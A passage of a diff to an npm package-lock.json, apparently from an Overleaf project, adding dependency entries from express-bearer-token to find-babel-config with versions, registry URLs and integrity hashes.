"sha512-2+kRZT2xo+pmmvSY7Ma5FzxTJpO3kGaPCEXPbAm3GaoZ/z6FE4K6L7cvs1AUZwY2xkk15PcQw7t4dWjsl5rdJw==", + "dependencies": { + "cookie": "^0.3.1", + "cookie-parser": "^1.4.4" + }, + "engines": { + "node": ">= 6.0.0" + } + }, + "node_modules/express-bearer-token/node_modules/cookie": { + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.3.1.tgz", + "integrity": "sha1-5+Ch+e9DtMi6klxcWpboBtFoc7s=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/express-flash": { + "version": "0.0.2", + "resolved": "https://registry.npmjs.org/express-flash/-/express-flash-0.0.2.tgz", + "integrity": "sha512-QVUR0ZZRCaa8+iPHoUQaQJrQWcQuK/Q+19M7IUIdIEtvwhrA/ifHT7y1CVJI41YfGiOQnbGtn3uvd2vOdgu58A==", + "dependencies": { + "connect-flash": "0.1.x" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/express-http-proxy": { + "version": "1.6.3", + "resolved": "https://registry.npmjs.org/express-http-proxy/-/express-http-proxy-1.6.3.tgz", + "integrity": "sha512-/l77JHcOUrDUX8V67E287VEUQT0lbm71gdGVoodnlWBziarYKgMcpqT7xvh/HM8Jv52phw8Bd8tY+a7QjOr7Yg==", + "dependencies": { + "debug": "^3.0.1", + "es6-promise": "^4.1.1", + "raw-body": "^2.3.0" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/express-http-proxy/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/express-rate-limit": { + "version": "2.14.2", + "resolved": "https://registry.npmjs.org/express-rate-limit/-/express-rate-limit-2.14.2.tgz", + "integrity": "sha512-aVYzfYU2Bv+v6ry/fBpTrX8MorM0p/TeDnx4CqiLevg9ftG8eW+pyuZ6JEreGdG2t1vXyTGHuSNRKLeYixuqZg==", + "dependencies": { + "defaults": "^1.0.3" + } + }, + "node_modules/express-session": { + "version": "1.17.2", + "resolved": "https://registry.npmjs.org/express-session/-/express-session-1.17.2.tgz", + "integrity": "sha512-mPcYcLA0lvh7D4Oqr5aNJFMtBMKPLl++OKKxkHzZ0U0oDq1rpKBnkR5f5vCHR26VeArlTOEF9td4x5IjICksRQ==", + "dependencies": { + "cookie": "0.4.1", + "cookie-signature": "1.0.6", + "debug": "2.6.9", + "depd": "~2.0.0", + "on-headers": "~1.0.2", + "parseurl": "~1.3.3", + "safe-buffer": "5.2.1", + "uid-safe": "~2.1.5" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/express-session/node_modules/cookie": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.4.1.tgz", + "integrity": "sha512-ZwrFkGJxUR3EIoXtO+yVE69Eb7KlixbaeAWfBQB9vVsNn/o+Yw69gBWSSDK825hQNdN+wF8zELf3dFNl/kxkUA==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/express-session/node_modules/cookie-signature": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.6.tgz", + "integrity": "sha1-4wOogrNCzD7oylE6eZmXNNqzriw=" + }, + "node_modules/express-session/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/express-session/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + 
"node_modules/express-session/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g=" + }, + "node_modules/express-session/node_modules/safe-buffer": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/express/node_modules/cookie": { + "version": "0.7.1", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.7.1.tgz", + "integrity": "sha512-6DnInpx7SJ2AK3+CTUE/ZM0vWTUboZCegxhC2xiIydHR9jNuTAASBrfEpHhiGOZw/nX51bHt6YQl8jsGo4y/0w==", + "license": "MIT", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/express/node_modules/cookie-signature": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.6.tgz", + "integrity": "sha1-4wOogrNCzD7oylE6eZmXNNqzriw=" + }, + "node_modules/express/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/express/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/express/node_modules/encodeurl": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz", + "integrity": "sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/express/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "node_modules/express/node_modules/on-finished": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz", + "integrity": "sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==", + "dependencies": { + "ee-first": "1.1.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/express/node_modules/safe-buffer": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/express/node_modules/statuses": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/statuses/-/statuses-2.0.1.tgz", + "integrity": "sha512-RwNA9Z/7PrK06rYLIzFMlaF+l73iwpzsqRIFgbMLbTcLD6cOao82TaWefPXQvB2fOC4AjuYSEndS7N/mTCbkdQ==", + "engines": { + "node": ">= 0.8" + 
} + }, + "node_modules/expressionify": { + "version": "0.9.3", + "resolved": "https://registry.npmjs.org/expressionify/-/expressionify-0.9.3.tgz", + "integrity": "sha1-/iJnx+hpRXfxP02oML/DyNgXf5I=" + }, + "node_modules/ext": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/ext/-/ext-1.6.0.tgz", + "integrity": "sha512-sdBImtzkq2HpkdRLtlLWDa6w4DX22ijZLKx8BMPUuKe1c5lbN6xwQDQCxSfxBQnHZ13ls/FH0MQZx/q/gr6FQg==", + "dependencies": { + "type": "^2.5.0" + } + }, + "node_modules/extend": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", + "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" + }, + "node_modules/extend-shallow": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-3.0.2.tgz", + "integrity": "sha512-BwY5b5Ql4+qZoefgMj2NUmx+tehVTH/Kf4k1ZEtOHNFcm2wSxMRo992l6X3TIgni2eZVTZ85xMOjF31fwZAj6Q==", + "dev": true, + "dependencies": { + "assign-symbols": "^1.0.0", + "is-extendable": "^1.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/extglob": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/extglob/-/extglob-2.0.4.tgz", + "integrity": "sha512-Nmb6QXkELsuBr24CJSkilo6UHHgbekK5UiZgfE6UHD3Eb27YC6oD+bhcT+tJ6cl8dmsgdQxnWlcry8ksBIBLpw==", + "dev": true, + "dependencies": { + "array-unique": "^0.3.2", + "define-property": "^1.0.0", + "expand-brackets": "^2.1.4", + "extend-shallow": "^2.0.1", + "fragment-cache": "^0.2.1", + "regex-not": "^1.0.0", + "snapdragon": "^0.8.1", + "to-regex": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/extglob/node_modules/define-property": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-1.0.0.tgz", + "integrity": "sha512-cZTYKFWspt9jZsMscWo8sc/5lbPC9Q0N5nBLgb+Yd915iL3udB1uFgS3B8YCx66UVHq018DAVFoee7x+gxggeA==", + "dev": true, + "dependencies": { + "is-descriptor": "^1.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/extglob/node_modules/extend-shallow": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz", + "integrity": "sha512-zCnTtlxNoAiDc3gqY2aYAWFx7XWWiasuF2K8Me5WbN8otHKTUKBwjPtNpRs/rbUZm7KxWAaNj7P1a/p52GbVug==", + "dev": true, + "dependencies": { + "is-extendable": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/extglob/node_modules/is-extendable": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/is-extendable/-/is-extendable-0.1.1.tgz", + "integrity": "sha512-5BMULNob1vgFX6EjQw5izWDxrecWK9AM72rugNr0TFldMOi0fj6Jk+zeKIt0xGj4cEfQIJth4w3OKWOJ4f+AFw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/extract-zip": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extract-zip/-/extract-zip-2.0.1.tgz", + "integrity": "sha512-GDhU9ntwuKyGXdZBUgTIe+vXnWj0fppUEtMDL0+idd5Sta8TGpHssn/eusA9mrPr9qNDym6SxAYZjNvCn/9RBg==", + "dev": true, + "dependencies": { + "debug": "^4.1.1", + "get-stream": "^5.1.0", + "yauzl": "^2.10.0" + }, + "bin": { + "extract-zip": "cli.js" + }, + "engines": { + "node": ">= 10.17.0" + }, + "optionalDependencies": { + "@types/yauzl": "^2.9.1" + } + }, + "node_modules/extsprintf": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", + "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=", + "engines": [ + "node >=0.6.0" + ] + }, + "node_modules/fake-indexeddb": { + "version": 
"6.0.0", + "resolved": "https://registry.npmjs.org/fake-indexeddb/-/fake-indexeddb-6.0.0.tgz", + "integrity": "sha512-YEboHE5VfopUclOck7LncgIqskAqnv4q0EWbYCaxKKjAvO93c+TJIaBuGy8CBFdbg9nKdpN3AuPRwVBJ4k7NrQ==", + "dev": true, + "engines": { + "node": ">=18" + } + }, + "node_modules/fast-content-type-parse": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/fast-content-type-parse/-/fast-content-type-parse-2.0.1.tgz", + "integrity": "sha512-nGqtvLrj5w0naR6tDPfB4cUmYCqouzyQiz6C5y/LtcDllJdrcc6WaWW6iXyIIOErTa/XRybj28aasdn4LkVk6Q==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/fastify" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/fastify" + } + ], + "license": "MIT" + }, + "node_modules/fast-copy": { + "version": "2.1.7", + "resolved": "https://registry.npmjs.org/fast-copy/-/fast-copy-2.1.7.tgz", + "integrity": "sha512-ozrGwyuCTAy7YgFCua8rmqmytECYk/JYAMXcswOcm0qvGoE3tPb7ivBeIHTOK2DiapBhDZgacIhzhQIKU5TCfA==" + }, + "node_modules/fast-crc32c": { + "version": "2.0.0", + "resolved": "git+ssh://git@github.com/overleaf/node-fast-crc32c.git#aae6b2a4c7a7a159395df9cc6c38dfde702d6f51", + "integrity": "sha512-tv+vSqnHnz1MnUZvtJuTXPH2MjrO91lNUiMmafe6zflExluR8D16jhwtubb/lWk+fTOCv7S7pURWLulsC/sMrg==", + "license": "MIT", + "optionalDependencies": { + "@node-rs/crc32": "^0.1.7" + } + }, + "node_modules/fast-deep-equal": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", + "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" + }, + "node_modules/fast-diff": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/fast-diff/-/fast-diff-1.2.0.tgz", + "integrity": "sha512-xJuoT5+L99XlZ8twedaRf6Ax2TgQVxvgZOYoPKqZufmJib0tL2tegPBOZb1pVNgIhlqDlA0eO0c3wBvQcmzx4w==", + "dev": true + }, + "node_modules/fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==" + }, + "node_modules/fast-glob": { + "version": "3.3.3", + "resolved": "https://registry.npmjs.org/fast-glob/-/fast-glob-3.3.3.tgz", + "integrity": "sha512-7MptL8U0cqcFdzIzwOTHoilX9x5BrNqye7Z/LuC7kCMRio1EMSyqRK3BEAUD7sXRq4iT4AzTVuZdhgQ2TCvYLg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@nodelib/fs.stat": "^2.0.2", + "@nodelib/fs.walk": "^1.2.3", + "glob-parent": "^5.1.2", + "merge2": "^1.3.0", + "micromatch": "^4.0.8" + }, + "engines": { + "node": ">=8.6.0" + } + }, + "node_modules/fast-json-parse": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/fast-json-parse/-/fast-json-parse-1.0.3.tgz", + "integrity": "sha512-FRWsaZRWEJ1ESVNbDWmsAlqDk96gPQezzLghafp5J4GUKjbCz3OkAHuZs5TuPEtkbVQERysLp9xv6c24fBm8Aw==", + "dev": true, + "license": "MIT" + }, + "node_modules/fast-json-patch": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/fast-json-patch/-/fast-json-patch-3.1.1.tgz", + "integrity": "sha512-vf6IHUX2SBcA+5/+4883dsIjpBTqmfBjmYiWK1savxQmFk4JfBMLa7ynTYOs1Rolp/T1betJxHiGD3g1Mn8lUQ==" + }, + "node_modules/fast-json-stable-stringify": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", + "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" + }, + "node_modules/fast-levenshtein": { + "version": "2.0.6", + "resolved": 
"https://registry.npmjs.org/fast-levenshtein/-/fast-levenshtein-2.0.6.tgz", + "integrity": "sha1-PYpcZog6FqMMqGQ+hR8Zuqd5eRc=" + }, + "node_modules/fast-safe-stringify": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/fast-safe-stringify/-/fast-safe-stringify-2.1.1.tgz", + "integrity": "sha512-W+KJc2dmILlPplD/H4K9l9LcAHAfPtP6BY84uVLXQ6Evcz9Lcg33Y2z1IVblT6xdY54PXYVHEv+0Wpq8Io6zkA==", + "dev": true + }, + "node_modules/fast-text-encoding": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/fast-text-encoding/-/fast-text-encoding-1.0.3.tgz", + "integrity": "sha512-dtm4QZH9nZtcDt8qJiOH9fcQd1NAgi+K1O2DbE6GG1PPCK/BWfOH3idCTRQ4ImXRUOyopDEgDEnVEE7Y/2Wrig==" + }, + "node_modules/fast-uri": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/fast-uri/-/fast-uri-3.0.1.tgz", + "integrity": "sha512-MWipKbbYiYI0UC7cl8m/i/IWTqfC8YXsqjzybjddLsFjStroQzsHXkc73JutMvBiXmOvapk+axIl79ig5t55Bw==", + "dev": true + }, + "node_modules/fast-xml-parser": { + "version": "4.2.5", + "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-4.2.5.tgz", + "integrity": "sha512-B9/wizE4WngqQftFPmdaMYlXoJlJOYxGQOanC77fq9k8+Z0v5dDSVh+3glErdIROP//s/jgb7ZuxKfB8nVyo0g==", + "funding": [ + { + "type": "paypal", + "url": "https://paypal.me/naturalintelligence" + }, + { + "type": "github", + "url": "https://github.com/sponsors/NaturalIntelligence" + } + ], + "optional": true, + "peer": true, + "dependencies": { + "strnum": "^1.0.5" + }, + "bin": { + "fxparser": "src/cli/cli.js" + } + }, + "node_modules/fastest-levenshtein": { + "version": "1.0.16", + "resolved": "https://registry.npmjs.org/fastest-levenshtein/-/fastest-levenshtein-1.0.16.tgz", + "integrity": "sha512-eRnCtTTtGZFpQCwhJiUOuxPQWRXVKYDn0b2PeHfXL6/Zi53SLAzAHfVhVWK2AryC/WH05kGfxhFIPvTF0SXQzg==", + "dev": true, + "engines": { + "node": ">= 4.9.1" + } + }, + "node_modules/fastparse": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/fastparse/-/fastparse-1.1.2.tgz", + "integrity": "sha512-483XLLxTVIwWK3QTrMGRqUfUpoOs/0hbQrl2oz4J0pAcm3A3bu84wxTFqGqkJzewCLdME38xJLJAxBABfQT8sQ==", + "dev": true + }, + "node_modules/fastq": { + "version": "1.13.0", + "resolved": "https://registry.npmjs.org/fastq/-/fastq-1.13.0.tgz", + "integrity": "sha512-YpkpUnK8od0o1hmeSc7UUs/eB/vIPWJYjKck2QKIzAf71Vm1AAQ3EbuZB3g2JIy+pg+ERD0vqI79KyZiB2e2Nw==", + "dependencies": { + "reusify": "^1.0.4" + } + }, + "node_modules/faye-websocket": { + "version": "0.11.4", + "resolved": "https://registry.npmjs.org/faye-websocket/-/faye-websocket-0.11.4.tgz", + "integrity": "sha512-CzbClwlXAuiRQAlUyfqPgvPoNKTckTPGfwZV4ZdAhVcP2lh9KUxJg2b5GkE7XbjKQ3YJnQ9z6D9ntLAlB+tP8g==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "websocket-driver": ">=0.5.1" + }, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/fclone": { + "version": "1.0.11", + "resolved": "https://registry.npmjs.org/fclone/-/fclone-1.0.11.tgz", + "integrity": "sha1-EOhdo4v+p/xZk0HClu4ddyZu5kA=", + "dev": true + }, + "node_modules/fd-package-json": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/fd-package-json/-/fd-package-json-1.2.0.tgz", + "integrity": "sha512-45LSPmWf+gC5tdCQMNH4s9Sr00bIkiD9aN7dc5hqkrEw1geRYyDQS1v1oMHAW3ysfxfndqGsrDREHHjNNbKUfA==", + "dev": true, + "license": "MIT", + "dependencies": { + "walk-up-path": "^3.0.1" + } + }, + "node_modules/fd-slicer": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/fd-slicer/-/fd-slicer-1.1.0.tgz", + "integrity": "sha1-JcfInLH5B3+IkbvmHY85Dq4lbx4=", + "dependencies": { 
+ "pend": "~1.2.0" + } + }, + "node_modules/feature-detect-es6": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/feature-detect-es6/-/feature-detect-es6-1.5.0.tgz", + "integrity": "sha512-DzWPIGzTnfp3/KK1d/YPfmgLqeDju9F2DQYBL35VusgSApcA7XGqVtXfR4ETOOFEzdFJ3J7zh0Gkk011TiA4uQ==", + "dependencies": { + "array-back": "^1.0.4" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/feature-detect-es6/node_modules/array-back": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/array-back/-/array-back-1.0.4.tgz", + "integrity": "sha1-ZEun8JX3/898Q7Xw3DnTwfA8Bjs=", + "dependencies": { + "typical": "^2.6.0" + }, + "engines": { + "node": ">=0.12.0" + } + }, + "node_modules/feature-policy": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/feature-policy/-/feature-policy-0.3.0.tgz", + "integrity": "sha512-ZtijOTFN7TzCujt1fnNhfWPFPSHeZkesff9AXZj+UEjYBynWNUIYpC87Ve4wHzyexQsImicLu7WsC2LHq7/xrQ==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/figures": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/figures/-/figures-3.2.0.tgz", + "integrity": "sha512-yaduQFRKLXYOGgEn6AZau90j3ggSOyiqXU0F9JZfeXYhNa+Jk4X+s45A2zg5jns87GAFa34BBm2kXw4XpNcbdg==", + "dev": true, + "dependencies": { + "escape-string-regexp": "^1.0.5" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/figures/node_modules/escape-string-regexp": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", + "integrity": "sha1-G2HAViGQqN/2rjuyzwIAyhMLhtQ=", + "dev": true, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/file-entry-cache": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/file-entry-cache/-/file-entry-cache-6.0.1.tgz", + "integrity": "sha512-7Gps/XWymbLk2QLYK4NzpMOrYjMhdIxXuIvy2QBsLE6ljuodKvdkWs/cpyJJ3CVIVpH0Oi1Hvg1ovbMzLdFBBg==", + "dependencies": { + "flat-cache": "^3.0.4" + }, + "engines": { + "node": "^10.12.0 || >=12.0.0" + } + }, + "node_modules/file-loader": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/file-loader/-/file-loader-6.2.0.tgz", + "integrity": "sha512-qo3glqyTa61Ytg4u73GultjHGjdRyig3tG6lPtyX/jOEJvHif9uB0/OCI2Kif6ctF3caQTW2G5gym21oAsI4pw==", + "dev": true, + "dependencies": { + "loader-utils": "^2.0.0", + "schema-utils": "^3.0.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^4.0.0 || ^5.0.0" + } + }, + "node_modules/file-selector": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/file-selector/-/file-selector-0.6.0.tgz", + "integrity": "sha512-QlZ5yJC0VxHxQQsQhXvBaC7VRJ2uaxTf+Tfpu4Z/OcVQJVpZO+DGU0rkoVW5ce2SccxugvpBJoMvUs59iILYdw==", + "dependencies": { + "tslib": "^2.4.0" + }, + "engines": { + "node": ">= 12" + } + }, + "node_modules/file-uri-to-path": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/file-uri-to-path/-/file-uri-to-path-1.0.0.tgz", + "integrity": "sha512-0Zt+s3L7Vf1biwWZ29aARiVYLx7iMGnEUl9x33fbB/j3jR81u/O2LbqK+Bm1CDSNDKVtJ/YjwY7TUd5SkeLQLw==" + }, + "node_modules/filelist": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", + "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", + "dependencies": { + "minimatch": "^5.0.1" + } + }, + 
"node_modules/filelist/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/filelist/node_modules/minimatch": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.0.tgz", + "integrity": "sha512-9TPBGGak4nHfGZsPBohm9AWg6NoT7QTCehS3BIJABslyZbzxfV78QM2Y6+i741OPZIafFAaiiEMh5OyIrJPgtg==", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/fill-range": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", + "dependencies": { + "to-regex-range": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/finalhandler": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/finalhandler/-/finalhandler-1.3.1.tgz", + "integrity": "sha512-6BN9trH7bp3qvnrRyzsBz+g3lZxTNZTbVO2EV1CS0WIcDbawYVdYvGflME/9QP0h0pYlCDBCTjYa9nZzMDpyxQ==", + "dependencies": { + "debug": "2.6.9", + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "on-finished": "2.4.1", + "parseurl": "~1.3.3", + "statuses": "2.0.1", + "unpipe": "~1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/finalhandler/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/finalhandler/node_modules/encodeurl": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz", + "integrity": "sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/finalhandler/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "node_modules/finalhandler/node_modules/on-finished": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz", + "integrity": "sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==", + "dependencies": { + "ee-first": "1.1.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/finalhandler/node_modules/statuses": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/statuses/-/statuses-2.0.1.tgz", + "integrity": "sha512-RwNA9Z/7PrK06rYLIzFMlaF+l73iwpzsqRIFgbMLbTcLD6cOao82TaWefPXQvB2fOC4AjuYSEndS7N/mTCbkdQ==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/find-babel-config": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/find-babel-config/-/find-babel-config-2.1.1.tgz", + "integrity": "sha512-5Ji+EAysHGe1OipH7GN4qDjok5Z1uw5KAwDCbicU/4wyTZY7CqOCzcWbG7J5ad9mazq67k89fXlbc1MuIfl9uA==", + "dev": true, + "dependencies": { + "json5": "^2.2.3", + "path-exists": "^4.0.0" + } + }, 